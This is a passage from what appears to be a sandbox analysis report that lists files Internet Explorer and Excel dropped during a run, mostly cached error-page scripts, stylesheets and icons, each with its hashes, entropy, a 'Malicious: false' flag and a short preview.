                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\httpErrorPagesScripts[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\background_gradient[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):5.019973044227213
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                            MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\down[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\errorPageStrings[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\info_48[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):4113
                                                                                                                                                                            Entropy (8bit):7.9370830126943375
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                            MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ErrorPageTemplate[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2168
                                                                                                                                                                            Entropy (8bit):5.207912016937144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ErrorPageTemplate[2]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):2168
                                                                                                                                                                            Entropy (8bit):5.207912016937144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                                                            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\bullet[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                            Entropy (8bit):7.304718288205936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                            MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\down[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/down.png
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\errorPageStrings[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: downloaded
Size (bytes): 4720
Entropy (8bit): 5.164796203267696
Encrypted: false
SSDEEP: 96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5: D65EC06F21C379C87040B83CC1ABAC6B
SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious: false
IE Cache URL: res://ieframe.dll/errorPageStrings.js
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http_404[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 6495
Entropy (8bit): 3.8998802417135856
Encrypted: false
SSDEEP: 48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
MD5: F65C729DC2D457B7A1093813F1253192
SHA1: 5006C9B50108CF582BE308411B157574E5A893FC
SHA-256: B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
SHA-512: 717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
Malicious: false
Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http_404[2]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 6495
Entropy (8bit): 3.8998802417135856
Encrypted: false
SSDEEP: 48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
MD5: F65C729DC2D457B7A1093813F1253192
SHA1: 5006C9B50108CF582BE308411B157574E5A893FC
SHA-256: B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
SHA-512: 717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
Malicious: false
Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\info_48[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 4113
Entropy (8bit): 7.9370830126943375
Encrypted: false
SSDEEP: 96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
MD5: 5565250FCC163AA3A79F0B746416CE69
SHA1: B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
SHA-256: 51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
SHA-512: E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
Malicious: false
Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..

C:\Users\user\AppData\Local\Temp\FAD40000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 328089
Entropy (8bit): 7.9252965238230955
Encrypted: false
SSDEEP: 6144:sB5vetPVUNAqybs1dddqbEDDtanTaZPXtFL+:M5vetPfqybs1dddqKtan4Xvy
MD5: 0DA9B4479B2791D67F80E10B35A01888
SHA1: A9299233EDB4B117F899CA30CF07C93E75F7274A
SHA-256: EA6F9AC28054EB576199219FEC033814EFCE3DF7069E181B1DD55D018B11691B
SHA-512: F1B2F37F68970DF37FA70094558223CBDA8C4A4246758F6353EAB75E84FA4ECDB8E5CF1D7C9F1B4D83559026942E4C4B73A47834DE03AB9E8CA50DA76BB4719E
Malicious: false
Preview: .UKO.1..W.?.|.v.@..*..@..T...{.5.K.....,)AK..rYy=..3....-...1.r.e..Uh....Z...g..U..J..b.H.lr.e|..HUB[jY....9...P.<....` ..0....f.OF.o\8...:f.6._...t...i{......W.T..........!%0.....x........|.K...$d9C...5%.......@..N..Jbu.!^.I...O...7.I.KC5...:.....]Z..b...7....%.l.ey|.nF.ey......7....{.q...n:U....&..|@....f...1]F..O+.[(4;.).5..u=$........_1.........C.x..x..x.{.m..3...S.......D...'".Q.z..M..b.e.n7./Q.h..........PK..........!.F...............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 89
Entropy (8bit): 4.48547855515619
Encrypted: false
SSDEEP: 3:oVXUWW+USnRAW8JOGXnEWW+USTn:o9URGnR9qERGT
MD5: 2004B1BBDAEBF298C66DA5A385D949D7
